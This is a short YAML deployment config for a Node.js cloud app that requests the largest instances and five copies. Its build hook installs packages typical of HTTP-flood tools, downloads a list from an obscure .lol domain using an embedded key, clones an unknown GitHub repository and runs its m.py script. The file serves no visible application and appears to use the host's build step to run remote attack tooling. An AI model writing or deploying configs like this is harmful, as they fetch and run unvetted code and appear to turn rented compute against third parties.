applications:
  myapp:
    type: 'nodejs:24'

    # Highest VM size for max CPU/RAM (e.g., up to 8+ CPU/17GB+ RAM on XL depending on plan)
    size: XL

    # 5 instances for scaling/load distribution
    count: 5

    build:
      flavor: none

    hooks:
      build: |
        apt-get update
        apt-get install -y python3 python3-pip python3-dev build-essential libssl-dev git curl

        pip3 install --upgrade pip
        pip3 install aioquic uvloop requests

        npm install net chalk hpack.js hpack colors puppeteer-real-browser cluster

        curl -s "https://xn--mnqu23e2hf.lol/api.php?key=user1208&country=all" > k.txt

        git clone https://github.com/vrbrh921-glitch/Fc.git
        cd Fc
        python3 m.py
